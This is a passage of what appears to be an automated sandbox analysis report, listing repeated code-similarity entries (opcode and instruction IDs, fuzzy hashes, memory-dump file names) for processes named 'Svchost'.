                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95e8cd8dcc00ab90fce66ae62413496b3850a2b30d3a2ee200020102067a0c56
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62712A21B1EA8A0FE795EB6C98751B97BE1EF87221B0801BED44DC7293DD6C6C428351
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 57ab483a73b89b01b4ea7a03f1b826c2062c15405de3bcf1c8c4807a6d054aff
                                                                                                                                                                                                          • Instruction ID: b6a4bbd16e3e0d351260f21da8bdcb6e1163bcac12a82886e5acfdc404303857
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57ab483a73b89b01b4ea7a03f1b826c2062c15405de3bcf1c8c4807a6d054aff
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68319521B1D9490FE798FB6C946A37DA7C2EF99351F0405BEE44EC7293DD68AC428341
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c71676715cc99f8dec3d1d366425706e2d9ff938377991dc573f882fffac70ce
                                                                                                                                                                                                          • Instruction ID: 7041502b50169f345e977a1411268c5c48f1e6ba4af3fac69319e5c48018af46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c71676715cc99f8dec3d1d366425706e2d9ff938377991dc573f882fffac70ce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E31B421B19A095FEB94BBFC58693BE77D1EF99311F0402BAE00DC32D2DD6C68418391
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6bf9e0ed933cceb2605edf063415f47fa0df89f5769fe2824ad8d986caa18d93
                                                                                                                                                                                                          • Instruction ID: 75943a4afe10d13d72944734092629d6ddb9bcfd6903d7eb4f8a6d3b1cf17894
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bf9e0ed933cceb2605edf063415f47fa0df89f5769fe2824ad8d986caa18d93
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93318D34B19A0E9FEB84EBA8C4B56AA7BF1FF89311F580579D009D3286CE786841C750
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2198558358.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 54b0a12f30f4db7fe03b8e779d654cf2cf9d76ae95af9f2e59a224acace7fba4
                                                                                                                                                                                                          • Instruction ID: ff22ec0383cbe61b2b54e6981c05454c34ca3e37be01fa3ce2b83a329144a00f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54b0a12f30f4db7fe03b8e779d654cf2cf9d76ae95af9f2e59a224acace7fba4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60014205A0E7810FE792E73858B15667FE19F87210B4C05BAD888C70E7DD0CA981C392
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f20135c36d72b22a58da00153fb567aa0a6d0dcc7ff80252d50c670748f3437b
                                                                                                                                                                                                          • Instruction ID: f30a1524ea6df54a1dd5501f46f46bef901fe813cf97dc90cb54ed16a025942f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f20135c36d72b22a58da00153fb567aa0a6d0dcc7ff80252d50c670748f3437b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31127F20B28A094BE798FBBC84B5679B3D6FF99315F540579E44EC32D2DE3CA8418741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8b5be4f2ebedfeede5347faf55a3d7923e3b96f5e3fc1d0180f8f4cbd23ca02c
                                                                                                                                                                                                          • Instruction ID: abb0bccca16c89379ce1f2244ec1cb5232d53f68efea7436f787d9f5102964a4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b5be4f2ebedfeede5347faf55a3d7923e3b96f5e3fc1d0180f8f4cbd23ca02c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC127F20B28A194FE7A8FBB884B56B972D6FF99315F440579E44EC32D2DE3DA8018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f230c93cf02accddc81afb02aede36de8afe8ae6741bd4f7eee2017dcb5c99d1
                                                                                                                                                                                                          • Instruction ID: a68bd4dd2d9019a36ec32dcddd3c99a3b18a9acfc3d5956cd835e5cf0406561d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f230c93cf02accddc81afb02aede36de8afe8ae6741bd4f7eee2017dcb5c99d1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D51FF20B0E6C90FE796A77858B6275ABD5DF97316B0804FEE08DC7193DD185806D342
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d02899487611983a58abfe5eac0d1815553d66ad7e245edfd5b076a32546c344
                                                                                                                                                                                                          • Instruction ID: e5e1bf420040acfd077691cc3f289a5e7ca3eea375a642e02d850ebfdb4158f1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d02899487611983a58abfe5eac0d1815553d66ad7e245edfd5b076a32546c344
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70712921B1DA8A4FE795E76C88B51B97BE2EF87210B0901BED44DC7293DD6C6C42C351
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 824c12825f03d8de98fa182b37b621cd4b426ca70c0ab440ac0756c18167f4c6
                                                                                                                                                                                                          • Instruction ID: d03279bb873eb672e659f2acc6a6b4807cde03100e93917a0d066d9797b6ff17
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 824c12825f03d8de98fa182b37b621cd4b426ca70c0ab440ac0756c18167f4c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC318421B1D9490FE7A8FB6C946A279A7C2EF99315F0405BEE44EC3293DD68AC428341
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3ee2cce2f9454d696d937c4b45b0be91214c6a0001e3490059a05835c3f11431
                                                                                                                                                                                                          • Instruction ID: 843a94e57168033c91e936dbffacb4bd0b41085c46d03290e89d99cb98709a28
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ee2cce2f9454d696d937c4b45b0be91214c6a0001e3490059a05835c3f11431
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0319221B18A095FFB94BBEC98693BD77D6EF99311F1502BAE00DC32D3DD2868418791
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 32102b4af6651879312009e32b92e6c7d8ef0c1810b8d2567c004c16fae0e9b7
                                                                                                                                                                                                          • Instruction ID: 94b5d99379c6878e370de81f071971b71ab2a7a58eef8a8fd68a65e002224075
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32102b4af6651879312009e32b92e6c7d8ef0c1810b8d2567c004c16fae0e9b7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7314934B18A0E9FEB94EBA8C4B56AA77F1FF99311F540179D00DE3296CE3CA8418751
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.2253309019.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd34880000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 69250afb29494b6d40377c34e460edf3e9a4cbdb674424e10cc8d225fca446c9
                                                                                                                                                                                                          • Instruction ID: e8e26ab2f343f34e919c8f9a25968f04b2fc20dcccccfaa74dd1155e2c8d0373
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69250afb29494b6d40377c34e460edf3e9a4cbdb674424e10cc8d225fca446c9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D014208A0C7844FF782A33848B11657FE09F93200B4801BAD8C9C20E7DD0CA9858346
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c9a5bcc9ea9e708421106fdd40229c20513cd0015525afe734acd172848d26b1
                                                                                                                                                                                                          • Instruction ID: 3080a3da2155f82a08eb4b97ce1ab2844fea7f43e5e70d5d9a365d2fb4f93074
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9a5bcc9ea9e708421106fdd40229c20513cd0015525afe734acd172848d26b1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14329621B19A494FE798FBB884B5679B7D2FF99301F54457AE40EC32D2DE38AC018781
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f1ba08b46c25f30c3d7007c5fa9d0c2db8d8c682e006657a692f9b4902a9194e
                                                                                                                                                                                                          • Instruction ID: db7b4f4dc576fa8c80d55897a561b4a114a42e9a02ae0ceba8b5aadfbce5eff8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1ba08b46c25f30c3d7007c5fa9d0c2db8d8c682e006657a692f9b4902a9194e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4251FF10B1E6C90FE796A77858B5275AFD5DF87216B0804FFE089C72A3DD185806D342
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 28059cd0761cfc09587600555b43eb23f8d96e6ad7716b2e6cf9849a63c09de7
                                                                                                                                                                                                          • Instruction ID: 390b904a8803c36672f8bd5ab3e295703aaf0280b6a6714cf9435e58038ebe8a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28059cd0761cfc09587600555b43eb23f8d96e6ad7716b2e6cf9849a63c09de7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD712921B1DA4A0FE755E7AC98761B97BE2EF87251F0401BFD44DC3293DD686C428391
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 82f456477a85eba94b86d260fd24bb35489ee44daa9757b63b04d7276e1ba5e8
                                                                                                                                                                                                          • Instruction ID: b0a0aa6b18aaf959419389235a892c6f72e788dbcb1849b8c847df7e4fde5a94
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82f456477a85eba94b86d260fd24bb35489ee44daa9757b63b04d7276e1ba5e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F31B721B1D9490FE798FB6C54AA279B7C1EF99351F0405BEE04EC3293DD68AC428741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e824455fa10afabe30ce4d100e5af3f10cc24534058aa8a49de3b777e1e293a7
                                                                                                                                                                                                          • Instruction ID: c3e83eefb7c58a597df81859508be3b68e103c9214386c8eb600e8a01c8b86a7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e824455fa10afabe30ce4d100e5af3f10cc24534058aa8a49de3b777e1e293a7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B331C621B18A095FEB54BBEC58693BEB7E5EF99351F54027AE00DC32D2DD2868418392
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 3a9b0588837a2dfcca568c88ecff5f5bb4cf1749fc04843e70bbbd1bbaad7bc3
                                                                                                                                                                                                          • Instruction ID: c69c2b219f18bc44a8796367344526c8a3360e25b4ac3dac7f00465c4dc85039
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a9b0588837a2dfcca568c88ecff5f5bb4cf1749fc04843e70bbbd1bbaad7bc3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15318034B18A0E5FDB54EBE8C4756ADBBF1FF99301F54457AD009D3286DE38A8418790
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000A.00000002.2334983800.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd348c0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2f6294bbdbae588c424bf9febcf6a9fb00aee3a9d133225e9a7af025710695bd
                                                                                                                                                                                                          • Instruction ID: c61528db750ab79c428f9ae7acb51f42f82bb5e613ca34d4927393eceab44659
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f6294bbdbae588c424bf9febcf6a9fb00aee3a9d133225e9a7af025710695bd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA014214A0C7800FE742A73858B1566BFE09F93200B4805BBD88AC70E7DD08A9858382
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9af6186efcfbb79a9c504e178f9ac420a3e89fc88168ab0b605956926f139cca
                                                                                                                                                                                                          • Instruction ID: 7e34742a2e478dc909180258ae27cc3d4f00664adde2105cf25c15cddbc70d06
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9af6186efcfbb79a9c504e178f9ac420a3e89fc88168ab0b605956926f139cca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2632B420B29A094FEB98EBBC84B567977D2FF99740F5405B9E50ED32C2DE78AC018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9aa13066788c8248447e9b60eb0ac07cb122eb0820739f0475dbea1245fceee6
                                                                                                                                                                                                          • Instruction ID: 5c09d396bb2f8c1c01f46e6cdb6f1da791a8afab5782db7056edcd25cbd69c46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9aa13066788c8248447e9b60eb0ac07cb122eb0820739f0475dbea1245fceee6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC512020B0E6C90FE796AB7858B5279BFD5DF87216B0804FEE08DC72A3DD485806C352
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8c455ccef71c434264a30f55cdbdd2606fef32ee8517afb9328a7558cb50bb88
                                                                                                                                                                                                          • Instruction ID: 3f914d931218905d2f933b01f6f43438077212027c0bb0efb1ffc32bcba712ba
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c455ccef71c434264a30f55cdbdd2606fef32ee8517afb9328a7558cb50bb88
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B715921B1EA8A0FE795EB6C98751B97BE1EF87210B0401BED54DD7293DD6C6C028350
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2808727cfb5e2d5f0753b8d9d7f9bed3cde5e60f824da22dd6299097c7197b0e
                                                                                                                                                                                                          • Instruction ID: 17026f395c06cef4c4795b4115f9ca14e3b6447310b113ad8b60f536b5bac58e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2808727cfb5e2d5f0753b8d9d7f9bed3cde5e60f824da22dd6299097c7197b0e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28319521B1D9490FE798FB6C946A37DA7C2EF99351F0405BEE44EC7293DD68AC428341
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7221289175de5979ecf79fee09a1431d51a386d69c5c6ef6a6fb142633adab6d
                                                                                                                                                                                                          • Instruction ID: 7041502b50169f345e977a1411268c5c48f1e6ba4af3fac69319e5c48018af46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7221289175de5979ecf79fee09a1431d51a386d69c5c6ef6a6fb142633adab6d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E31B421B19A095FEB94BBFC58693BE77D1EF99311F0402BAE00DC32D2DD6C68418391
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 08d62a0a20f6f067a6edab5c31154763aa0deb5a89359b936803e13b92c76722
                                                                                                                                                                                                          • Instruction ID: fc5156ed9cc619d4cb9312ceafa0148103fc8989eb521f3e27367b2d0ba76de7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08d62a0a20f6f067a6edab5c31154763aa0deb5a89359b936803e13b92c76722
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15317E34B18A1A8FEB95EBA8C4B56ED7BF1FF99340F540579D109D3286CE3868428790
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000C.00000002.2787804227.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
